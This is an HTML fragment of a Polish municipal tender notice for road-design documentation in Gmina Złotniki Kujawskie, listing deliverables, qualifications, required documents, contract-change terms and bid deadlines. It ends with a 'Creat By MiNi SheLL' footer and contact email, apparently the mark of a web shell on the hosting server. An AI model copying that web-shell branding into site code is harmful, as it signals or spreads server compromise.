oraz<br/>zatwierdzeniem – 6 egz.,<br/>6) Opracowanie dokumentacji geotechnicznej 3 egz.,<br/>7) Opracowanie inwentaryzacji zieleni – 6 egz.,<br/>8) Opracowanie przedmiarów robót oraz kosztorysów inwestorskich – 4 egz., (przedmiar oraz kosztorys ma zawierać także<br/>zakres prac związany z budową kanału technologicznego),<br/>9) Opracowanie szczególnych specyfikacji technicznych wykonania i odbioru robót – 4 egz.,<br/>10) Opracowanie wstępnej wersji dokumentacji projektowo-kosztorysowej<br/>Dokumentację, o której mowa powyżej Wykonawca zobowiązuje się dostarczyć<br/>w wersji elektronicznej – na płytach CD/DVD, pliki w formacie PDF oraz w wersji edytowalnej, rysunki w wersji DWG i PDF<br/>oraz kosztorysy i przedmiary w wersji PDF i w wersji edytowalnej ATH.<br/>Ponadto w ramach przedmiotu zamówienia:<br/>a) przedstawienie Zamawiającemu w ciągu 14 dni od dnia zawarcia umowy harmonogramu realizacji prac projektowych,<br/>celem jego akceptacji,<br/>b) wykonawca zobowiązany jest dokonać zgłoszenia robót budowlanych lub złożyć wniosek i uzyskać pozwolenie na<br/>budowę. W przypadku uwag Starosty Inowrocławskiego do zgłoszenia lub złożonego wniosku o pozwolenie na budowę<br/>Wykonawca zobowiązany jest do dokonania odpowiednich korekt. Ponadto Wykonawca zobowiązany jest do uzyskania<br/>braku sprzeciwu lub uzyskania decyzji<br/>o pozwoleniu na budowę/ZRID,<br/>b) w przypadku wystąpienia kolizji z infrastrukturą techniczną należy ją uzgodnić z gestorami urządzeń i uwzględnić w projekcie;<br/>c) uzyskanie mapy do celów projektowych,<br/>d) wykonawca zobowiązany będzie również do opracowania odpowiedzi na pytania dotyczące wykonania dokumentacji<br/>projektowej w trakcie realizacji inwestycji oraz na etapie postępowania o udzielenie zamówienia publicznego na roboty<br/>budowlane w terminie wyznaczonym przez Zamawiającego, nie dłuższym niż 3 dni robocze oraz sporządzenie wszelkich<br/>opracowań projektowych i wykonanie czynności niezbędnych do zrealizowania przedmiotu zamówienia;<br/>e) w przypadku konieczności zmiany dokumentacji projektowej – wystąpienie,<br/>w imieniu Zamawiającego z wnioskiem o zmianę dokumentacji,<br/>f) w przypadku, gdy w toku wykonawstwa robót budowlanych lub w okresie gwarancji robót zajdzie konieczność<br/>wprowadzenia uszczegółowień lub zmian do dokumentacji projektowej – wprowadzenie niezbędnych zmian (również w<br/>wersji elektronicznej)<br/>i dostarczenie poprawionej dokumentacji do siedziby Zamawiającego w terminie uzgodnionym z Zamawiającym,<br/>g) opracowana dokumentacja projektowo-kosztorysowa, z uwagi na jej późniejsze wykorzystanie przez Zamawiającego przy<br/>opracowaniu opisu przedmiotu zamówienia robót budowlanych, które podlegać będzie rygorom Prawa Zamówień<br/>Publicznych, nie może zawierać rozwiązań, które mogą w jakikolwiek sposób powodować naruszenie przez Zamawiającego<br/>przepisów Prawa Zamówień Publicznych, w szczególności nie mogą utrudniać uczciwej konkurencji,<br/>h) wykonawca po opracowaniu dokumentacji projektowej, uzyskaniu wymaganych uzgodnień i zatwierdzeń oraz uzyskaniu<br/>ostatecznej decyzji pozwolenia na budowę lub dokonaniu skutecznego zgłoszenia budowy/przebudowy/wykonania robót<br/>budowlanych zobowiązany jest do zdania Zamawiającemu kompletu dokumentacji,<br/>i) wykonawca uzyska decyzje środowiskową (jeśli dotyczy);<br/>j) wykonawca zobowiązany będzie dokonać jednokrotnej aktualizacji kosztorysu inwestorskiego przed wszczęciem przez<br/>Zamawiającego postępowania przetargowego na wykonanie przebudowy drogi – w ramach zaproponowanej ceny ofertowej;<br/>k) wykonawca będzie zobowiązany do:<br/>• ustalenia z Zamawiającym danych wyjściowych do sporządzenia przedmiarów,<br/>• uzgodnienia z Zamawiającym rozwiązań funkcjonalnych przed rozpoczęciem opracowania dokumentacji oraz<br/>uwzględnienie ustalonych wymogów podczas opracowania dokumentacji,<br/>• przedstawienie Zamawiającemu w ciągu 30 dni od dnia zawarcia umowy<br/>w siedzibie Zamawiającego wstępnej wersji dokumentacji projektowo-kosztorysowej, a po jej zaakceptowaniu przez<br/>Zamawiającego przystąpienie do dalszych prac projektowych,<br/>• wykorzystania w opracowanej dokumentacji projektowej najnowszych rozwiązań,<br/>• konsultacja na roboczo z Zamawiającym zaproponowanych rozwiązań<br/>i uzgadniania z Zamawiającym doboru materiałów budowlanych i standardów wykończenia zaproponowanych rozwiązań<br/>projektowych,<br/>• na etapie projektowania Zamawiający wymaga minimum dwukrotnego przeprowadzenia konsultacji koncepcji projektu w<br/>siedzibie Zamawiającego,<br/>• Wykonawca w trakcie prac projektowych jest zobowiązany informować Zamawiającego o stanie zaawansowania prac oraz<br/>o proponowanych rozwiązaniach projektowych. Zamawiający zastrzega sobie prawo do oceny, korekty i akceptacji<br/>proponowanych rozwiązań w trakcie prowadzonych prac projektowych,<br/>• Zamawiający wymaga, aby Projektant w dokumentacji określił właściwości materiałów z uwzględnieniem art. 29 ustawy i<br/>zgodnie z wymogami art. 30 ust. 1-3 i 5 ustawy Prawo zamówień publicznych oraz z zachowaniem przepisów ustawy<br/>z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2022 r. poz.1233 ze zm.).<br/>(Powyższy wymóg uzasadniony jest tym, że stwarzanie sytuacji powodujących pośrednio lub bezpośrednio narzucanie<br/>wykonawcom robót przez podmioty trzecie konieczności dokonania zakupu u danego przedsiębiorcy poprzez podawanie w<br/>dokumentacji technicznej znaków towarowych, patentów lub pochodzenia urządzeń lub materiałów stanowi tzw. czyn<br/>nieuczciwej konkurencji w rozumieniu przepisów ustawy o zwalczaniu nieuczciwej konkurencji.) UWAGA:<br/>• Wykonawca na podstawie udzielonego pełnomocnictwa do działania w imieniu Gminy Złotniki Kujawskie zobowiązany jest<br/>w imieniu Zamawiającego i na jego rzecz uzyskać wymagane opinie, uzgodnienia, warunki i decyzje niezbędne do<br/>opracowania projektu. Koszty z tym związane ponosi Wykonawca, w ramach zaproponowanej ceny ofertowej,<br/>• Jeżeli w trakcie opracowywania ww. projektu nastąpi zmiana przepisów należy je uwzględnić przy realizacji przedmiotu<br/>zamówienia,<br/>• Dokumentacja projektowa powinna spełniać wymagania zawarte<br/>w Rozporządzeniu Ministra Rozwoju z 11 września 2020 r. w sprawie szczegółowego zakresu i formy projektu budowalnego<br/>(Dz. U. z 2022 r.<br/>poz. 1679 ze zm.),<br/>• Dokumentacja projektowa powinna spełniać wymagania zawarte<br/>w Rozporządzeniu Ministra Rozwoju i Technologii z dnia 20 grudnia 2021 r.<br/>w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót<br/>budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. z 2021 r. poz. 2454 ze zm.),<br/>• Dokumentacja projektowa powinna spełniać wymagania zawarte<br/>w Rozporządzeniu Ministra Rozwoju i Technologii z dnia 20 grudnia 2021 r.<br/>w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac<br/>projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym<br/>(Dz.U. z 2021 r. poz. 2458 ze zm.),<br/>• Dokumentacja projektowa powinna spełniać wymagania zawarte w ustawie z dnia 19 lipca 2019 r. o zapewnianiu dostępności osobom ze szczególnymi potrzebami (Dz. U. z 2022 r. poz. 2240, ze zm.),<br/>• Złożony przez Wykonawcę projekt (zakres i forma) musi spełniać wszelkie wymagania niezbędne do wszczęcia i<br/>prowadzenia o udzielenie zamówienia publicznego, a następnie rozpoczęcia i wykonania robót budowlanych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-12</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia może się ubiegać wykonawca, który spełnia poniżej określone warunki udziału w postępowaniu<br/>dotyczące:<br/>1) sytuacji ekonomicznej lub finansowej:<br/>Nie dotyczy<br/>2) zdolności technicznej lub zawodowej:<br/>Zamawiający uzna, że wykonawca posiada wymagane zdolności techniczne lub zawodowe zapewniające należyte<br/>wykonanie zamówienia, jeżeli wykonawca wykaże, że:<br/>a) w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy<br/>– w tym okresie wykonał, co najmniej jedną usługę polegającą na wykonaniu dokumentacji projektowej na budowę lub przebudowę drogi .<br/>W przypadku wspólnego ubiegania się wykonawców o udzielenie zamówienia ww. warunek wykonawcy ci mogą spełniać<br/>łącznie.<br/>b) dysponuje lub będzie dysponować osobą (skierowaną przez wykonawcę do realizacji zamówienia) posiadającą<br/>uprawnienia budowlane do projektowania bez ograniczeń w specjalności drogowej lub odpowiadające im równoważne<br/>uprawnienia, które zostały wydane na podstawie wcześniejszych przepisów<br/>W przypadku wspólnego ubiegania się wykonawców o udzielenie zamówienia ww. warunek wykonawcy ci mogą spełniać<br/>łącznie.<br/>2. Dodatkowe informacje dotyczące ww. warunków udziału w postępowaniu:<br/>1) wszystkie ww. osoby skierowane przez wykonawcę do realizacji zamówienia muszą biegle posługiwać się językiem<br/>polskim. W przeciwnym razie wykonawca udostępni wystarczającą ilość tłumaczy, wykazujących znajomość języka<br/>technicznego w zakresie terminologii budowlanej, we wszystkich specjalnościach występujących przy realizacji zamówienia 2) ilekroć w treści SWZ jest mowa o „uprawnieniach budowlanych”, „budowie”, „przebudowie”, należy pojęcia te rozumieć<br/>zgodnie z definicjami określonymi<br/>w ustawie Prawo budowlane oraz aktami wykonawczymi do niej,<br/>3) jeżeli wykonawca lub podmiot udostępniający zasoby zrealizował zadanie<br/>w trybie zaprojektuj i wybuduj, zamawiający uzna robotę budowlaną za spełniającą warunek, jeżeli robota ta będzie<br/>odpowiadała swoim zakresem<br/>i wartością wymogom określonym w pkt 1 ppkt 2) lit. a),<br/>4) jeżeli wykonawca powołuje się na doświadczenie w realizacji usługi polegającej na wykonaniu dokumentacji projektowej,<br/>wykonanej wspólnie z innymi wykonawcami wykaz usług, o którym mowa w Rozdziale VI pkt 2 ppkt 1 (wykaz usług),<br/>dotyczy usług, w których wykonaniu wykonawca ten bezpośrednio uczestniczył,<br/>5) w przypadku, gdy jakakolwiek wartość dotycząca ww. warunków wyrażona będzie w walucie obcej, zamawiający<br/>przeliczy tę wartość w oparciu o średni kurs walut NBP dla danej waluty z daty wszczęcia postępowania. Jeżeli w tym dniu<br/>średni kurs NBP nie będzie opublikowany zamawiający przyjmie średni kurs<br/>z ostatniego dnia przed dniem wszczęcia. Jeżeli w jakimkolwiek dokumencie złożonym przez wykonawcę wskazane zostaną<br/>kwoty wyrażone w walucie nie znajdującej się aktualnie w obrocie, zamawiający dokona przeliczenia tych kwot na złotówki<br/>na podstawie ostatniego średniego miesięcznego kursu złotego<br/>w stosunku do tych walut, ujawnionego w Tabeli Kursów Narodowego Banku Polskiego<br/>6) korzystanie z podmiotów udostępniających zasoby:<br/>a) wykonawca może w celu potwierdzenia spełniania warunków udziału<br/>w postępowaniu polegać na zdolnościach technicznych lub zawodowych podmiotów udostępniających zasoby, niezależnie<br/>od charakteru prawnego łączących go z nimi stosunków prawnych,<br/>b) w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy mogą<br/>polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają roboty budowlane lub usługi, do<br/>realizacji których te zdolności są wymagane,<br/>c) wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności lub sytuację podmiotów<br/>udostępniających zasoby, jeżeli na etapie składania ofert nie polegał on w danym zakresie na zdolnościach lub sytuacji<br/>podmiotów udostępniających zasoby. Wykonawca polegający na zdolnościach lub sytuacji podmiotów udostępniających<br/>zasoby dołącza do oferty dokumenty, o których mowa w Rozdziale VI pkt 1 ppkt 6 i 7 SWZ.<br/>7) w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do<br/>realizacji których te zdolności są wymagane. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do<br/>oferty oświadczenie, o którym mowa w Rozdziale VI pkt 1 ppkt 8 SWZ, <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Dokumenty wymagane przez zamawiającego, które należy złożyć składając ofertę:<br/>1) formularz oferty, według wzoru stanowiącego załącznik nr 1 do SWZ;<br/>2) odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub<br/>innego właściwego rejestru, w celu potwierdzenia, że osoba działająca w imieniu (odpowiednio: wykonawcy lub podmiotu<br/>udostępniającego zasoby) jest umocowana do jego reprezentowania; wykonawca nie jest zobowiązany do złożenia ww.<br/>dokumentów, jeżeli zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca<br/>wskazał w załączniku nr 1 do SWZ (formularz oferty) dane umożliwiające dostęp do tych dokumentów.<br/>3) pełnomocnictwa lub inne dokumenty potwierdzające umocowanie do reprezentowania (odpowiednio: wykonawcy,<br/>podmiotu udostępniającego zasoby, wykonawców wspólnie ubiegających się o udzielenie zamówienia), jeżeli w imieniu<br/>(odpowiednio: wykonawcy, podmiotu udostępniającego zasoby, wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia) działa osoba, której umocowanie do reprezentowania nie wynika z dokumentów, o których mowa w pkt 1 ppkt<br/>2)<br/>4) oświadczenie wykonawcy o niepodleganiu wykluczeniu, według wzoru stanowiącego załącznik nr 2 do SWZ;<br/>Uwaga! W przypadku wspólnego ubiegania się wykonawców o udzielenie zamówienia ww. dokument składa każdy z<br/>wykonawców.<br/>5) oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, według wzoru stanowiącego załącznik nr 3 do SWZ;<br/>Uwaga! W przypadku wspólnego ubiegania się wykonawców o udzielenie zamówienia ww. dokument składa każdy z<br/>wykonawców, w zakresie, w jakim wykazuje spełnianie warunków udziału w postępowaniu.<br/>6) oświadczenie wykonawcy o poleganiu na zdolnościach lub sytuacji podmiotów udostępniających zasoby, według wzoru<br/>stanowiącego załącznik nr 1 do SWZ;<br/>Uwaga! Ww. dokument należy złożyć tylko wtedy, gdy wykonawca polega na zdolnościach lub sytuacji podmiotu<br/>udostępniającego zasoby.<br/>7) zobowiązanie podmiotu udostępniającego zasoby do oddania wykonawcy do dyspozycji niezbędnych zasobów na<br/>potrzeby realizacji danego zamówienia wraz z oświadczeniem podmiotu udostępniającego zasoby, potwierdzającym brak<br/>podstaw wykluczenia tego podmiotu oraz spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca<br/>powołuje się na jego zasoby (wg wzoru stanowiącego załącznik nr 5 do SWZ). Zobowiązanie podmiotu udostępniającego<br/>zasoby może być zastąpione innym podmiotowym środkiem dowodowym potwierdzającym, że wykonawca realizując<br/>zamówienie, będzie dysponował niezbędnymi zasobami tego podmiotu;<br/>Uwaga! Ww. dokument należy złożyć tylko wtedy, gdy wykonawca polega na zdolnościach lub sytuacji podmiotu<br/>udostępniającego zasoby.<br/>8) oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia wskazujące, które roboty budowlane,<br/>dostawy lub usługi wykonają poszczególni wykonawcy, według wzoru stanowiącego załącznik nr 1 do SWZ.<br/>Uwaga! Ww. dokument należy złożyć w przypadku wspólnego ubiegania się wykonawców o udzielenie zamówienia.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Podmiotowe środki dowodowe wymagane przez zamawiającego, które należy złożyć na wezwanie, o którym mowa w art. 274 ust. 1<br/>ustawy na potwierdzenie, że wykonawca spełnia warunki udziału w postępowaniu, o których mowa<br/>w Rozdziale V pkt 1 SWZ:<br/>1) wykaz usług wykonanych nie wcześniej niż w okresie ostatnich<br/>5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz<br/>z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których usługi te zostały wykonane, oraz<br/>załączeniem dowodów określających czy te usługi zostały wykonane należycie, przy czym dowodami,<br/>o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli<br/>wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów<br/>- inne odpowiednie dokumenty;<br/>2) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług i kontrolę jakości wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i<br/>wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz<br/>informacją o podstawie do dysponowania tymi osobami;</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający zgodnie z art. 455 ustawy Pzp przewiduje możliwość wprowadzenia zmian do treści zawartej umowy w<br/>następującym zakresie:<br/>1) zmiana terminu wykonania zamówienia w następujących przypadkach:<br/>a) wystąpienia zdarzeń losowych (kataklizmy lub inne czynniki zewnętrzne, niemożliwe do przewidzenia wydarzenia, którym<br/>nie można zapobiec), które będą miały wpływ na treść zawartej umowy i termin realizacji usług;<br/>b) w przypadku zmiany przepisów powodujących konieczność zastosowania innych rozwiązań niż zakładano w opisie<br/>przedmiotu zamówienia;<br/>c) zmiany przepisów powodujących konieczność uzyskania dokumentów, które te przepisy narzucają;<br/>d) gdy właściwe organy administracji publicznej i instytucje uzgadniające nie wydały wymaganych decyzji administracyjnych<br/>lub uzgodnień w ustawowym terminie, a także w przypadku zmiany uzgodnienia, bądź wniesienia po wydaniu tych decyzji<br/>lub uzgodnień dodatkowych wymogów skutkującego koniecznością dokonania zmian lub uzupełnień w projekcie;<br/>e) konieczności dokonania korekt w zatwierdzonym przez Zamawiającego rozwiązaniu projektowym, a wynikających ze<br/>zmiany stanowiska Zamawiającego lub stanowiska instytucji uzgadniających (opiniujących);<br/>f) inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy, skutkujące niemożliwością prowadzenia<br/>działań w celu wykonania umowy, które Zamawiający uzna za uzasadniające zmianę terminu.<br/>g) zmiany będące następstwem działania lub braku działania organów administracji i innych podmiotów o kompetencjach<br/>zbliżonych do organów administracji w szczególności eksploatatorów infrastruktury, które spowodowały niezawinione i<br/>niemożliwe do uniknięcia przez Wykonawcę opóźnienie.<br/>2) inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy, skutkujące niemożliwością prowadzenia<br/>działań w celu wykonania umowy, które Zamawiający uzna za uzasadniające zmianę terminu.<br/>3) zmiany będące następstwem działania lub braku działania organów administracji w szczególności eksploratorów<br/>infrastruktury, które spowodowały niezawinione i niemożliwe do uniknięcia przez Wykonawcę opóźnienie.<br/>4.Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią<br/>jednocześnie zobowiązania do wyrażenia takiej zgody.<br/>5.Zamawiający przewiduje również możliwość dokonywania nieistotnych zmian postanowień umowy, które nie dotyczą<br/>treści oferty, na podstawie której dokonano wyboru Wykonawcy.<br/>6.Nie stanowi zmiany umowy:<br/>1) zmiana danych związanych z obsługą administracyjno-organizacyjną umowy<br/>(np. zmiana nr rachunku bankowego);<br/>2) zmiana danych teleadresowych. <br/>7.Strona występująca o zmianę postanowień zawartej umowy zobowiązana jest do udokumentowania zaistnienia<br/>okoliczności, o których mowa w pkt 3. Wniosek o zmianę postanowień umowy musi być wyrażony na piśmie.<br/>6. Zmiana umowy może nastąpić wyłącznie w formie pisemnego aneksu pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-10-07 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/988592</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-10-07 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p>

Creat By MiNi SheLL
Email: jattceo@gmail.com